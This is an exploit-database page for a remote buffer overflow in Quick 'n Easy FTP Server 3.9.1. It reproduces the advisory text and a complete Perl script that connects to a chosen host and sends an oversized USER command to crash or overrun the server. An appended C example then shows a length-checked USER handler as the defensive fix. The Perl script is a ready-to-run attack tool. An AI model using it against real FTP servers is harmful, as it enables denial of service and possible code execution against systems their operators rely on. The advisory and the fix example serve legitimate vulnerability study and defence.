Exploit Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow

Exploiter

18 Dec 2022
EDB-ID: 34403
EDB verified: Passed
Author: DEMONALEX
Vulnerability type: DOS
Platform: WINDOWS
CVE: N/A
Publication date: 2010-07-22
Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow
Code:
source: https://www.securityfocus.com/bid/42186/info

Quick 'n Easy FTP Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input before copying it to an insufficiently sized memory buffer.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Quick 'n Easy FTP Server 3.9.1 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl -w
#DoS Exploit of Quick Easy Ftp Server version <=3.9.1 USER COMMAND Buffer Overflow
#Vulnerability Discoverer & Author : demonalex[at]163[dot]com
use Socket;
$host=shift;
$port=shift || '21';
if(!defined($host)){
die("usage: $0 \$host [\$port]\n");
}
#$payload='A'x1604;
$payload=('A'x1600)."\x3D\x41\x41\x41";         #mov     dword ptr [ebx+4], ebp
$target_ip=inet_aton($host);
$target=sockaddr_in($port, $target_ip);
socket(SOCK, AF_INET, SOCK_STREAM, 6);
connect(SOCK, $target);
undef($content);
recv(SOCK, $content, 100, 0);                   #get ftp banner
send(SOCK, "USER "."$payload\r\n", 0);
printf("send ok!\n");
close(SOCK);
exit(0);
 
Source
www.exploit-db.com
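
The advisory attributes the flaw to a missing boundary check before the USER argument is copied into a fixed-size buffer. The handler below is an added example of that check done on the server side; it is not code from the original post or from the affected product, and `MAX_LINE`, `MAX_USER`, `struct ftp_session` and `handle_user_line` are assumed names and limits.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define MAX_LINE 512 /* assumed cap on one control-channel line */
#define MAX_USER 64  /* assumed cap on a username */
/* Hypothetical session state; not taken from the affected product. */
struct ftp_session { char user[MAX_USER + 1]; };

/* Case-insensitive match of the 5-byte "USER " prefix. */
static int is_user_verb(const char *p)
{
    static const char verb[] = "USER ";
    for (size_t i = 0; i < 5; i++)
        if (toupper((unsigned char)p[i]) != verb[i])
            return 0;
    return 1;
}

/* Handle one received line of len bytes (need not be NUL-terminated).
 * Returns the reply code: 331 accepted, 500 bad or oversized line,
 * 501 bad or oversized username. s->user changes only on 331. */
int handle_user_line(struct ftp_session *s, const char *line, size_t len)
{
    if (len > MAX_LINE)               /* reject before parsing or copying */
        return 500;
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;                        /* strip trailing CRLF */
    if (len < 5 || !is_user_verb(line))
        return 500;
    size_t arg_len = len - 5;
    if (arg_len == 0 || arg_len > MAX_USER)
        return 501;                   /* length checked against the destination */
    for (size_t i = 0; i < arg_len; i++)
        if (!isgraph((unsigned char)line[5 + i]))
            return 501;               /* no spaces or control bytes */
    memcpy(s->user, line + 5, arg_len);
    s->user[arg_len] = '\0';
    return 331;
}

int main(void)
{
    struct ftp_session s = { "" };
    char big[5 + 1604];               /* constructed: oversized USER argument */
    memcpy(big, "USER ", 5);
    memset(big + 5, 'A', 1604);
    printf("%d\n", handle_user_line(&s, "USER alice\r\n", 12));
    printf("%d\n", handle_user_line(&s, big, sizeof big));
    return 0;
}
```

The length test runs against the destination size before `memcpy`, so an oversized argument is refused with a reply code and the session buffer is left untouched.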
